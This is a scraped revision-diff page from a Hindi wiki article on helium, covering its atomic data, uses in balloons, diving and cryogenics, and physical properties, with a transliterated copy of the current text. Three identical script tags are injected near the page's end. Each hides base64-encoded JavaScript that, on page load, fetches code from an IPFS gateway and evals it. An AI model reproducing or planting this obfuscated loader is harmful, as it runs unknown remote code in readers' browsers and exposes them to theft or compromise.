Difference between revisions of "हीलियम"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(10 intermediate revisions by 3 users not shown)
Line 1: Line 1:
{{Elementbox
+
{{सूचना बक्सा हीलियम}}
|name=हीलियम
+
([[अंग्रेज़ी भाषा|अंग्रेज़ी]]:Helium) हीलियम [[आवर्त सारणी]] का द्वितीय [[तत्व]] है। हीलियम का प्रतीकानुसार '''He''' तथा [[परमाणु संख्या]] 2 होती है। हीलियम का [[परमाणु द्रव्यमान]] 4.002602 होता है। हीलियम का [[इलेक्ट्रॉनिक विन्यास]] 1s<sup>2</sup> होता है। हीलियम की खोज '''फ्रैंकलैण्ड''' और '''लोकेयर''' ने की थी। हीलियम ब्रह्मांड में दूसरा सर्वाधिक पाया जाने वाला तत्त्व है।
|symbol=He
 
|number=2
 
|pronounce=
 
|left=-[[हाइड्रोजन]]
 
|right=[[लिथियम]]
 
|above=-
 
|below=[[नियोन|Ne]]
 
|series=अक्रिय गैस
 
|series comment=
 
|group=18
 
|period=1
 
|block=s
 
|series color=
 
|phase color=
 
|appearance=रंगहीन गैस, हीलियम एक उच्च बिजली के क्षेत्र में रखा गया है और यह एक बैंगनी चमक प्रदर्शित करता है।
 
|image name=Helium-Glow.jpg
 
|image size=
 
|image name comment=
 
|image name 2=Helium-Spectra.jpg
 
|image size 2=
 
|image name 2 comment=हीलियम की वर्णक्रम रेखाएँ
 
|atomic mass=4.002602
 
|atomic mass 2=2
 
|atomic mass comment=
 
|electron configuration=1s<sup>2</sup>
 
|electrons per shell=2
 
|color=रंगहीन
 
|phase=गैस
 
|phase comment=
 
|density gplstp=0.1786
 
|density gpcm3nrt=
 
|density gpcm3nrt 3=
 
|density gpcm3mp=0.145
 
|melting point K=0.95
 
|melting point C=−272.20
 
|melting point F=−457.96
 
|melting point pressure=
 
|sublimation point K=
 
|sublimation point C=
 
|sublimation point F=
 
|sublimation point pressure=
 
|boiling point K=4.22
 
|boiling point C=−268.93
 
|boiling point F=−452.07
 
|boiling point pressure=
 
|triple point K=
 
|triple point kPa=
 
|triple point K 2=
 
|triple point kPa 2=
 
|critical point K=5.19
 
|critical point MPa=0.227
 
|heat fusion=0.0138
 
|heat fusion 2=
 
|heat fusion pressure=
 
|heat vaporization=0.0829
 
|heat vaporization pressure=
 
|heat capacity=20.786
 
|heat capacity pressure=
 
|vapor pressure 1=
 
|vapor pressure 10=
 
|vapor pressure 100=1.23
 
|vapor pressure 1 k=1.67
 
|vapor pressure 10 k=2.48
 
|vapor pressure 100 k=4.21
 
|vapor pressure comment=
 
|crystal structure=षटकोणीय
 
|oxidation states=
 
|oxidation states comment=
 
|electronegativity=
 
|number of ionization energies=2
 
|1st ionization energy=2372.3
 
|2nd ionization energy=5250.5
 
|3rd ionization energy=
 
|atomic radius=
 
|atomic radius calculated=
 
|covalent radius=28
 
|Van der Waals radius=140
 
|magnetic ordering=[[प्रतिचुम्बकीय]]<ref>Magnetic susceptibility of the elements and inorganic compounds, in Handbook of Chemistry and Physics 81st edition, CRC press.</ref>
 
|electrical resistivity=
 
|electrical resistivity at 0=
 
|electrical resistivity at 20=
 
|thermal conductivity=0.1513
 
|thermal conductivity 2=
 
|thermal diffusivity=
 
|thermal expansion=
 
|thermal expansion at 25=
 
|speed of sound=972
 
|speed of sound rod at 20=
 
|speed of sound rod at r.t.=
 
|Tensile strength=
 
|Young's modulus=
 
|Shear modulus=
 
|Bulk modulus=
 
|Poisson ratio=
 
|Mohs hardness=
 
|Vickers hardness=
 
|Brinell hardness=
 
|CAS number=7440-59-7
 
|isotopes=
 
{{Elementbox isotopes stable | mn=3 | sym=He | na=0.000137% | n=1 }}
 
{{Elementbox isotopes stable | mn=4 | sym=He | na=99.999863% | n=2 | link=}}
 
}}
 
 
 
([[अंग्रेज़ी भाषा|अंग्रेज़ी]]:Helium) हीलियम [[आवर्त सारणी]] का द्वितीय [[तत्व]] है। इसका प्रतीकानुसार 'He' तथा [[परमाणु संख्या]] 2 होती है। इसका [[परमाणु द्रव्यमान]] 4.002602 होता है। इसका [[इलेक्ट्रॉनिक विन्यास]] 1s<sup>2</sup> होता है। इसकी खोज '''फ्रैंकलैण्ड''' और '''लोकेयर''' ने की थी। हीलियम एक हल्की, अज्वलनशील और [[अक्रिय गैस]] है। यह ब्रह्मांड में दूसरा सर्वाधिक पाया जाने वाला तत्व है।
 
 
==हीलियम का उपयोग==
 
==हीलियम का उपयोग==
*हीलियम का उपयोग वायुयान के टायरों में भरने में किया जाता है। हल्की गैस होने के कारण हीलियम वायुयान को ऊपर उठाता है।  
+
*हीलियम का उपयोग वायुयान के टायरों में भरने में किया जाता है। हल्की [[गैस]] होने के कारण हीलियम वायुयान को ऊपर उठाता है।  
 
*मौसम संबंधी जानकारी प्राप्त करने के लिए गुब्बारे में हीलियम गैस भरकर उसे छोड़ा जाता है।  
 
*मौसम संबंधी जानकारी प्राप्त करने के लिए गुब्बारे में हीलियम गैस भरकर उसे छोड़ा जाता है।  
*हीलियम और [[ऑक्सीजन]] का [[मिश्रण]] गहरे समुद्रों में गोताखोरों द्वारा वायु के स्थान पर प्रयोग किया जाता है, क्योंकि अधिक [[दाब]] पर हीलियम [[नाइट्रोजन]] की अपेक्षा रक्त में कम विलेय होता है।  
+
*हीलियम और [[ऑक्सीजन]] का [[मिश्रण]] गहरे समुद्रों में गोताखोरों द्वारा वायु के स्थान पर प्रयोग किया जाता है, क्योंकि अधिक [[दाब]] पर हीलियम [[नाइट्रोजन]] की अपेक्षा [[रक्त]] में कम विलेय होता है।  
 
*अस्पतालों में दमा के रोगों को कृत्रिम सांस के रूप में हीलियम और ऑक्सीजन गैस का मिश्रण दिया जाता है।  
 
*अस्पतालों में दमा के रोगों को कृत्रिम सांस के रूप में हीलियम और ऑक्सीजन गैस का मिश्रण दिया जाता है।  
*[[द्रव]] हीलियम का उपयोग निम्न [[ताप]] पर प्रयोगों में निम्न तापीय अभिकर्मक के रूप मेँ किया जाता है।
+
*[[द्रव]] हीलियम का उपयोग निम्न [[ताप]] पर प्रयोगों में निम्न तापीय अभिकर्मक के रूप में किया जाता है।
 +
==भौतिक गुण==
 +
*हीलियम रंगहीन गैस है।
 +
*हीलियम का [[क्वथनांक]] एवं [[गलनांक]] सबसे कम है।
 +
*हीलियम एक हल्की, अज्वलनशील और [[अक्रिय गैस]] है।
 +
*हीलियम तापध्वनि और [[विद्युत]] का सुचालक है।
  
{{लेख प्रगति
+
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक3|माध्यमिक=|पूर्णता=|शोध=}}
|आधार=
 
|प्रारम्भिक=प्रारम्भिक1
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 +
==संबंधित लेख==
 +
{{आवर्त सारणी}}{{रसायन विज्ञान}}
 
[[Category:रसायन विज्ञान]]
 
[[Category:रसायन विज्ञान]]
 +
[[Category:रासायनिक तत्त्व]]
 +
[[Category:गैसें]]
 +
[[Category:अक्रिय गैस]]
 
[[Category:विज्ञान_कोश]]
 
[[Category:विज्ञान_कोश]]
 
__INDEX__
 
__INDEX__

Latest revision as of 07:36, 17 February 2021

  1. REDIRECTsaancha:Infobox element

(aangrezi:Helium) hiliyam avart sarani ka dvitiy tatv hai. hiliyam ka pratikanusar He tatha paramanu sankhya 2 hoti hai. hiliyam ka paramanu dravyaman 4.002602 hota hai. hiliyam ka ilektr aaunik vinyas 1s2 hota hai. hiliyam ki khoj phraiankalaind aur lokeyar ne ki thi. hiliyam brahmaand mean doosara sarvadhik paya jane vala tattv hai.

hiliyam ka upayog

  • hiliyam ka upayog vayuyan ke tayaroan mean bharane mean kiya jata hai. halki gais hone ke karan hiliyam vayuyan ko oopar uthata hai.
  • mausam sanbandhi janakari prapt karane ke lie gubbare mean hiliyam gais bharakar use chho da jata hai.
  • hiliyam aur aauksijan ka mishran gahare samudroan mean gotakhoroan dvara vayu ke sthan par prayog kiya jata hai, kyoanki adhik dab par hiliyam naitrojan ki apeksha rakt mean kam viley hota hai.
  • aspataloan mean dama ke rogoan ko kritrim saans ke roop mean hiliyam aur aauksijan gais ka mishran diya jata hai.
  • drav hiliyam ka upayog nimn tap par prayogoan mean nimn tapiy abhikarmak ke roop mean kiya jata hai.

bhautik gun


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>